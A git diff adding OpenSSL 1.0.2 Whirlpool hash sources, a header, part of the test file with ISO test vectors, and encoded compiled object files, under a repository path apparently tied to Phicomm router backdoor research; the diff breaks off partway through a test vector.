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
WCsR5=>tFFYJk}*r=E*i%$NvXuB^-eO

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/wp_dgst.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/wp_dgst.c
new file mode 100644
index 0000000..e33bb4f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/wp_dgst.c
@@ -0,0 +1,257 @@
+/**
+ * The Whirlpool hashing function.
+ *
+ * <P>
+ * <b>References</b>
+ *
+ * <P>
+ * The Whirlpool algorithm was developed by
+ * <a href="mailto:pbarreto@scopus.com.br">Paulo S. L. M. Barreto</a> and
+ * <a href="mailto:vincent.rijmen@cryptomathic.com">Vincent Rijmen</a>.
+ *
+ * See
+ *      P.S.L.M. Barreto, V. Rijmen,
+ *      ``The Whirlpool hashing function,''
+ *      NESSIE submission, 2000 (tweaked version, 2001),
+ *      <https://www.cosic.esat.kuleuven.ac.be/nessie/workshop/submissions/whirlpool.zip>
+ *
+ * Based on "@version 3.0 (2003.03.12)" by Paulo S.L.M. Barreto and
+ * Vincent Rijmen. Lookup "reference implementations" on
+ * <http://planeta.terra.com.br/informatica/paulobarreto/>
+ *
+ * =============================================================================
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHORS ''AS IS'' AND ANY EXPRESS
+ * OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+ * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHORS OR CONTRIBUTORS BE
+ * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+ * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+ * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
+ * BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
+ * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
+ * OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
+ * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ *
+ */
+
+/*
+ * OpenSSL-specific implementation notes.
+ *
+ * WHIRLPOOL_Update as well as one-stroke WHIRLPOOL both expect
+ * number of *bytes* as input length argument. Bit-oriented routine
+ * as specified by authors is called WHIRLPOOL_BitUpdate[!] and
+ * does not have one-stroke counterpart.
+ *
+ * WHIRLPOOL_BitUpdate implements byte-oriented loop, essentially
+ * to serve WHIRLPOOL_Update. This is done for performance.
+ *
+ * Unlike authors' reference implementation, block processing
+ * routine whirlpool_block is designed to operate on multi-block
+ * input. This is done for perfomance.
+ */
+
+#include "wp_locl.h"
+#include <openssl/crypto.h>
+#include <string.h>
+
+fips_md_init(WHIRLPOOL)
+{
+    memset(c, 0, sizeof(*c));
+    return (1);
+}
+
+int WHIRLPOOL_Update(WHIRLPOOL_CTX *c, const void *_inp, size_t bytes)
+{
+    /*
+     * Well, largest suitable chunk size actually is
+     * (1<<(sizeof(size_t)*8-3))-64, but below number is large enough for not
+     * to care about excessive calls to WHIRLPOOL_BitUpdate...
+     */
+    size_t chunk = ((size_t)1) << (sizeof(size_t) * 8 - 4);
+    const unsigned char *inp = _inp;
+
+    while (bytes >= chunk) {
+        WHIRLPOOL_BitUpdate(c, inp, chunk * 8);
+        bytes -= chunk;
+        inp += chunk;
+    }
+    if (bytes)
+        WHIRLPOOL_BitUpdate(c, inp, bytes * 8);
+
+    return (1);
+}
+
+void WHIRLPOOL_BitUpdate(WHIRLPOOL_CTX *c, const void *_inp, size_t bits)
+{
+    size_t n;
+    unsigned int bitoff = c->bitoff,
+        bitrem = bitoff % 8, inpgap = (8 - (unsigned int)bits % 8) & 7;
+    const unsigned char *inp = _inp;
+
+    /*
+     * This 256-bit increment procedure relies on the size_t being natural
+     * size of CPU register, so that we don't have to mask the value in order
+     * to detect overflows.
+     */
+    c->bitlen[0] += bits;
+    if (c->bitlen[0] < bits) {  /* overflow */
+        n = 1;
+        do {
+            c->bitlen[n]++;
+        } while (c->bitlen[n] == 0
+                 && ++n < (WHIRLPOOL_COUNTER / sizeof(size_t)));
+    }
+#ifndef OPENSSL_SMALL_FOOTPRINT
+ reconsider:
+    if (inpgap == 0 && bitrem == 0) { /* byte-oriented loop */
+        while (bits) {
+            if (bitoff == 0 && (n = bits / WHIRLPOOL_BBLOCK)) {
+                whirlpool_block(c, inp, n);
+                inp += n * WHIRLPOOL_BBLOCK / 8;
+                bits %= WHIRLPOOL_BBLOCK;
+            } else {
+                unsigned int byteoff = bitoff / 8;
+
+                bitrem = WHIRLPOOL_BBLOCK - bitoff; /* re-use bitrem */
+                if (bits >= bitrem) {
+                    bits -= bitrem;
+                    bitrem /= 8;
+                    memcpy(c->data + byteoff, inp, bitrem);
+                    inp += bitrem;
+                    whirlpool_block(c, c->data, 1);
+                    bitoff = 0;
+                } else {
+                    memcpy(c->data + byteoff, inp, bits / 8);
+                    bitoff += (unsigned int)bits;
+                    bits = 0;
+                }
+                c->bitoff = bitoff;
+            }
+        }
+    } else                      /* bit-oriented loop */
+#endif
+    {
+        /*-
+                   inp
+                   |
+                   +-------+-------+-------
+                      |||||||||||||||||||||
+                   +-------+-------+-------
+        +-------+-------+-------+-------+-------
+        ||||||||||||||                          c->data
+        +-------+-------+-------+-------+-------
+                |
+                c->bitoff/8
+        */
+        while (bits) {
+            unsigned int byteoff = bitoff / 8;
+            unsigned char b;
+
+#ifndef OPENSSL_SMALL_FOOTPRINT
+            if (bitrem == inpgap) {
+                c->data[byteoff++] |= inp[0] & (0xff >> inpgap);
+                inpgap = 8 - inpgap;
+                bitoff += inpgap;
+                bitrem = 0;     /* bitoff%8 */
+                bits -= inpgap;
+                inpgap = 0;     /* bits%8 */
+                inp++;
+                if (bitoff == WHIRLPOOL_BBLOCK) {
+                    whirlpool_block(c, c->data, 1);
+                    bitoff = 0;
+                }
+                c->bitoff = bitoff;
+                goto reconsider;
+            } else
+#endif
+            if (bits >= 8) {
+                b = ((inp[0] << inpgap) | (inp[1] >> (8 - inpgap)));
+                b &= 0xff;
+                if (bitrem)
+                    c->data[byteoff++] |= b >> bitrem;
+                else
+                    c->data[byteoff++] = b;
+                bitoff += 8;
+                bits -= 8;
+                inp++;
+                if (bitoff >= WHIRLPOOL_BBLOCK) {
+                    whirlpool_block(c, c->data, 1);
+                    byteoff = 0;
+                    bitoff %= WHIRLPOOL_BBLOCK;
+                }
+                if (bitrem)
+                    c->data[byteoff] = b << (8 - bitrem);
+            } else {            /* remaining less than 8 bits */
+
+                b = (inp[0] << inpgap) & 0xff;
+                if (bitrem)
+                    c->data[byteoff++] |= b >> bitrem;
+                else
+                    c->data[byteoff++] = b;
+                bitoff += (unsigned int)bits;
+                if (bitoff == WHIRLPOOL_BBLOCK) {
+                    whirlpool_block(c, c->data, 1);
+                    byteoff = 0;
+                    bitoff %= WHIRLPOOL_BBLOCK;
+                }
+                if (bitrem)
+                    c->data[byteoff] = b << (8 - bitrem);
+                bits = 0;
+            }
+            c->bitoff = bitoff;
+        }
+    }
+}
+
+int WHIRLPOOL_Final(unsigned char *md, WHIRLPOOL_CTX *c)
+{
+    unsigned int bitoff = c->bitoff, byteoff = bitoff / 8;
+    size_t i, j, v;
+    unsigned char *p;
+
+    bitoff %= 8;
+    if (bitoff)
+        c->data[byteoff] |= 0x80 >> bitoff;
+    else
+        c->data[byteoff] = 0x80;
+    byteoff++;
+
+    /* pad with zeros */
+    if (byteoff > (WHIRLPOOL_BBLOCK / 8 - WHIRLPOOL_COUNTER)) {
+        if (byteoff < WHIRLPOOL_BBLOCK / 8)
+            memset(&c->data[byteoff], 0, WHIRLPOOL_BBLOCK / 8 - byteoff);
+        whirlpool_block(c, c->data, 1);
+        byteoff = 0;
+    }
+    if (byteoff < (WHIRLPOOL_BBLOCK / 8 - WHIRLPOOL_COUNTER))
+        memset(&c->data[byteoff], 0,
+               (WHIRLPOOL_BBLOCK / 8 - WHIRLPOOL_COUNTER) - byteoff);
+    /* smash 256-bit c->bitlen in big-endian order */
+    p = &c->data[WHIRLPOOL_BBLOCK / 8 - 1]; /* last byte in c->data */
+    for (i = 0; i < WHIRLPOOL_COUNTER / sizeof(size_t); i++)
+        for (v = c->bitlen[i], j = 0; j < sizeof(size_t); j++, v >>= 8)
+            *p-- = (unsigned char)(v & 0xff);
+
+    whirlpool_block(c, c->data, 1);
+
+    if (md) {
+        memcpy(md, c->H.c, WHIRLPOOL_DIGEST_LENGTH);
+        memset(c, 0, sizeof(*c));
+        return (1);
+    }
+    return (0);
+}
+
+unsigned char *WHIRLPOOL(const void *inp, size_t bytes, unsigned char *md)
+{
+    WHIRLPOOL_CTX ctx;
+    static unsigned char m[WHIRLPOOL_DIGEST_LENGTH];
+
+    if (md == NULL)
+        md = m;
+    WHIRLPOOL_Init(&ctx);
+    WHIRLPOOL_Update(&ctx, inp, bytes);
+    WHIRLPOOL_Final(md, &ctx);
+    return (md);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/wp_dgst.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/wp_dgst.o
new file mode 100644
index 0000000000000000000000000000000000000000..755d06108f9a90738f90bb3bfde8eb3611ec0c82
GIT binary patch
literal 3544
zcmbtWeQXp(6ra0o?G<pZD(EHnaTvs&!r7yKfD+v;d+nU8fYL%D!g(!K8v13s$A>{}
zb8YQd4*gGKO#DNQMolzE3FQxR$ET8*5Gt6Ukzzn7&;n_Y1HtvZ*%`YWB{A_ObML+1
zysw#gGkb4D%}TGwLnL{~lVnVjC?W4n7?U+FYUE}ziH!R1z8uN)KLF6^7hBPDCqnu%
z%J%C^b#_Rv(J%fMV;A&lJ@rRX4P^(HQ1%y1oe3CypLT$Kl%3F1CyJ=@W-n-zan>H-
zv8dg(6VYTbwKFu8D@YC-EN2v-^LH<XT(RvLo6|kCd)VJ~9H40Tv1A$TylR8I_I}Dv
znQVlzBQ$%e_#^~^_$ND$<0Q?VRLp7TVxHZnck~l4AqE>X)AKbWbQEUTKGTz-b5E_C
zLD^miksVTK=-}wb+rSfI9EnDb!J16AhX*}<J7q(Tq3$_D!8kI^ei;4OU>|jW{m@D%
z(qO;q{w-0GJ*7nFUSx;-T_3=d!Oq(|1_o*BYLUO^7XZNKHBY|}r$Xlk?BX2DM!RiG
zHP|KpmfV2NE=@4YH9fV<*9)AchJ7)6x88Y$ulHW3ymY$;CH5NAC-Lgu0zvOQh8B?n
z80;1v-@heegf0yX_8PZoqEOt$?j=y{(ECupHk%iC2@(ukp0?j-lxtg^!g9K27Y$)r
z+_>aq3K?BH!?TKz(a4|Ch&@#Kw{4HV63-c2hzxbNdj(9cpbrEnJ#s8EJoE&VM^n23
z%U9?x=qvP<dfaKarLpb26>QtD*TmRC=(G#aX#?14G;Q5Q%+Sa)b1$r&Aqw3%-AA*(
zKgDa^>W7umJ`N4e!<P7wvcuasn*C!QG|xQh|LPE(_8aw#P|snj7+e+Zily*Yg?gYG
zUJIuFrUTpj*}lyk5So1tEtNW2#P(Pdw;?cac|!Fgnw{x|-&8KR_MuensdZD>j(!a$
zX}Wrf7Rp94l>I#VIZY?!-k#+dBbn1)3vGkf*@8<t`37YdY2T*8UYOqILz~dvUh|F|
zw55;Q`;wzHmGQw{3MLPY6PtGbV%^zaf^KkY*vRN7{BBcrR$TArm#=U(ygJ5mF?QZe
z-v`E|hIXFW3VapqE4Z(eyLV0h3^>%(eZW#;>?g{OLzt6*LF}_|cTBcVXd@;&;fQ^X
z*D6}>gs}=8ymJ>uH`yQ@`%VlYscQcG$AhIcwaI2H8Jrs~50}k~JeK5Y<n`HQ;j)KA
z4(vD-0K?T4!l+tUgZ-O9Oo4$k*<r-<>T|@izQi+iQjzZ+xH;%^r<l7<a0<Lk$ge;k
zQmK}_?TxB|%}P`arVFTAx~VX#mi63ZsB=<9RqA5pNv}FbSIcy@v_cJ5sDTQ#q(b$9
z>%%ZMiddVFL#)kSQw^jQLk;#67;0&%uu9duakaEk4eHW$I+%Vd{Ej1!swF+%N;Qx|
zKktAV(A5%M_05E-Uxi%<a)`glyHE}EC{^lyk9VaSFk~&lY+Q!#UjaFfPs4SjjQi!l
zy_LIrt&0MY@@XOf9v7~;3>0#cOB)jvQZ%NxB!%G4UQY@?{cG`CLA}*gzdYk<0+%{J
zXTTnTfjyB=3ji1oUk*6N@4`L-;%5xJ5eDKVVvG100*1YS_yvJ?fR5AyW4!oeU2A;R
z%k5UUjx>eKXU}<*ETggK%*BfqnekY2gXK~y8myYuRSBz}#H-9j6}lN;R9U$sS{<*}
zE6iw|tXtjC*4Wz8(ipF8Y^hu0@)T}kkt-XT6OCgABpz?K5_N0hb*tCJUrIE<;=bfn
zW6u!yzd*<p@kq<R9QpW%*kC~U_!O~k`FP?6c-DnuPszMjZh$w7ea?@+?*@1Q8UkTB
z6lMI`0!M~_nIx{caMgt`aN+p9k@j^i{1z7;1Q`kQiluNJ-wz~-%YN<P=ol{h4_{Lx
zX)pV4kfUR`>^~B2-_T?wYJppA4qq*$w))0I*s5P|kubDXf`n_^+ex^trKzdD8L;LS
zt3C{G?JV9KLVvkA8E$QBX{~RwHjprnP`^6<Qd^>_UR3b^SP<N?mGWN<4KSpn*k4C;
zY^98RDhxEyV7Tc;@ucA2Pb55J6y-}3KoDpK48%qIAjIjryu1<@;iO7tf`l>i{WHQ}
z``6MDf_Zubbc`v#PjXuNKPUmgWq!#Y2VBZ-)6@U4{-?nSUuAcXVw`irKZuHp<o-#h
z76i<n?_Yu+ZXjP?aryo$zy?!kFx>QYv7@aQAf6xkN`HBN<K;$|fM}?%MSgr+WDGu!
kKR}o!|LhR|UVN(FMa4yV%OQB@$MY}6WI*`ca8thjKQ8>|=Kufz

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/wp_locl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/wp_locl.h
new file mode 100644
index 0000000..6e7b549
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/wp_locl.h
@@ -0,0 +1,3 @@
+#include <openssl/whrlpool.h>
+
+void whirlpool_block(WHIRLPOOL_CTX *, const void *, size_t);
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/wp_test.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/wp_test.c
new file mode 100644
index 0000000..2ea6251
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/wp_test.c
@@ -0,0 +1,241 @@
+/* ====================================================================
+ * Copyright (c) 2005 The OpenSSL Project.  All rights reserved.
+ * ====================================================================
+ */
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+
+#include <openssl/whrlpool.h>
+#include <openssl/crypto.h>
+
+#if defined(OPENSSL_NO_WHIRLPOOL)
+int main(int argc, char *argv[])
+{
+    printf("No Whirlpool support\n");
+    return (0);
+}
+#else
+
+/* ISO/IEC 10118-3 test vector set */
+unsigned char iso_test_1[WHIRLPOOL_DIGEST_LENGTH] = {
+    0x19, 0xFA, 0x61, 0xD7, 0x55, 0x22, 0xA4, 0x66,
+    0x9B, 0x44, 0xE3, 0x9C, 0x1D, 0x2E, 0x17, 0x26,
+    0xC5, 0x30, 0x23, 0x21, 0x30, 0xD4, 0x07, 0xF8,
+    0x9A, 0xFE, 0xE0, 0x96, 0x49, 0x97, 0xF7, 0xA7,
+    0x3E, 0x83, 0xBE, 0x69, 0x8B, 0x28, 0x8F, 0xEB,
+    0xCF, 0x88, 0xE3, 0xE0, 0x3C, 0x4F, 0x07, 0x57,
+    0xEA, 0x89, 0x64, 0xE5, 0x9B, 0x63, 0xD9, 0x37,
+    0x08, 0xB1, 0x38, 0xCC, 0x42, 0xA6, 0x6E, 0xB3
+};
+
+unsigned char iso_test_2[WHIRLPOOL_DIGEST_LENGTH] = {
+    0x8A, 0xCA, 0x26, 0x02, 0x79, 0x2A, 0xEC, 0x6F,
+    0x11, 0xA6, 0x72, 0x06, 0x53, 0x1F, 0xB7, 0xD7,
+    0xF0, 0xDF, 0xF5, 0x94, 0x13, 0x14, 0x5E, 0x69,
+    0x73, 0xC4, 0x50, 0x01, 0xD0, 0x08, 0x7B, 0x42,
+    0xD1, 0x1B, 0xC6, 0x45, 0x41, 0x3A, 0xEF, 0xF6,
+    0x3A, 0x42, 0x39, 0x1A, 0x39, 0x14, 0x5A, 0x59,
+    0x1A, 0x92, 0x20, 0x0D, 0x56, 0x01, 0x95, 0xE5,
+    0x3B, 0x47, 0x85, 0x84, 0xFD, 0xAE, 0x23, 0x1A
+};
+
+unsigned char iso_test_3[WHIRLPOOL_DIGEST_LENGTH] = {
+    0x4E, 0x24, 0x48, 0xA4, 0xC6, 0xF4, 0x86, 0xBB,
+    0x16, 0xB6, 0x56, 0x2C, 0x73, 0xB4, 0x02, 0x0B,
+    0xF3, 0x04, 0x3E, 0x3A, 0x73, 0x1B, 0xCE, 0x72,
+    0x1A, 0xE1, 0xB3, 0x03, 0xD9, 0x7E, 0x6D, 0x4C,
+    0x71, 0x81, 0xEE, 0xBD, 0xB6, 0xC5, 0x7E, 0x27,
+    0x7D, 0x0E, 0x34, 0x95, 0x71, 0x14, 0xCB, 0xD6,
+    0xC7, 0x97, 0xFC, 0x9D, 0x95, 0xD8, 0xB5, 0x82,
+    0xD2, 0x25, 0x29, 0x20, 0x76, 0xD4, 0xEE, 0xF5
+};
+
+unsigned char iso_test_4[WHIRLPOOL_DIGEST_LENGTH] = {
+    0x37, 0x8C, 0x84, 0xA4, 0x12, 0x6E, 0x2D, 0xC6,
+    0xE5, 0x6D, 0xCC, 0x74, 0x58, 0x37, 0x7A, 0xAC,
+    0x83, 0x8D, 0x00, 0x03, 0x22, 0x30, 0xF5, 0x3C,
+    0xE1, 0xF5, 0x70, 0x0C, 0x0F, 0xFB, 0x4D, 0x3B,
+    0x84, 0x21, 0x55, 0x76, 0x59, 0xEF, 0x55, 0xC1,
+    0x06, 0xB4, 0xB5, 0x2A, 0xC5, 0xA4, 0xAA, 0xA6,
+    0x92, 0xED, 0x92, 0x00, 0x52, 0x83, 0x8F, 0x33,
+    0x62, 0xE8, 0x6D, 0xBD, 0x37, 0xA8, 0x90, 0x3E
+};
+
+unsigned char iso_test_5[WHIRLPOOL_DIGEST_LENGTH] = {
+    0xF1, 0xD7, 0x54, 0x66, 0x26, 0x36, 0xFF, 0xE9,
+    0x2C, 0x82, 0xEB, 0xB9, 0x21, 0x2A, 0x48, 0x4A,
+    0x8D, 0x38, 0x63, 0x1E, 0xAD, 0x42, 0x38, 0xF5,
+    0x44, 0x2E, 0xE1, 0x3B, 0x80, 0x54, 0xE4, 0x1B,
+    0x08, 0xBF, 0x2A, 0x92, 0x51, 0xC3, 0x0B, 0x6A,
+    0x0B, 0x8A, 0xAE, 0x86, 0x17, 0x7A, 0xB4, 0xA6,
+    0xF6, 0x8F, 0x67, 0x3E, 0x72, 0x07, 0x86, 0x5D,
+    0x5D, 0x98, 0x19, 0xA3, 0xDB, 0xA4, 0xEB, 0x3B
+};
+
+unsigned char iso_test_6[WHIRLPOOL_DIGEST_LENGTH] = {
+    0xDC, 0x37, 0xE0, 0x08, 0xCF, 0x9E, 0xE6, 0x9B,
+    0xF1, 0x1F, 0x00, 0xED, 0x9A, 0xBA, 0x26, 0x90,
+    0x1D, 0xD7, 0xC2, 0x8C, 0xDE, 0xC0, 0x66, 0xCC,
+    0x6A, 0xF4, 0x2E, 0x40, 0xF8, 0x2F, 0x3A, 0x1E,
+    0x08, 0xEB, 0xA2, 0x66, 0x29, 0x12, 0x9D, 0x8F,
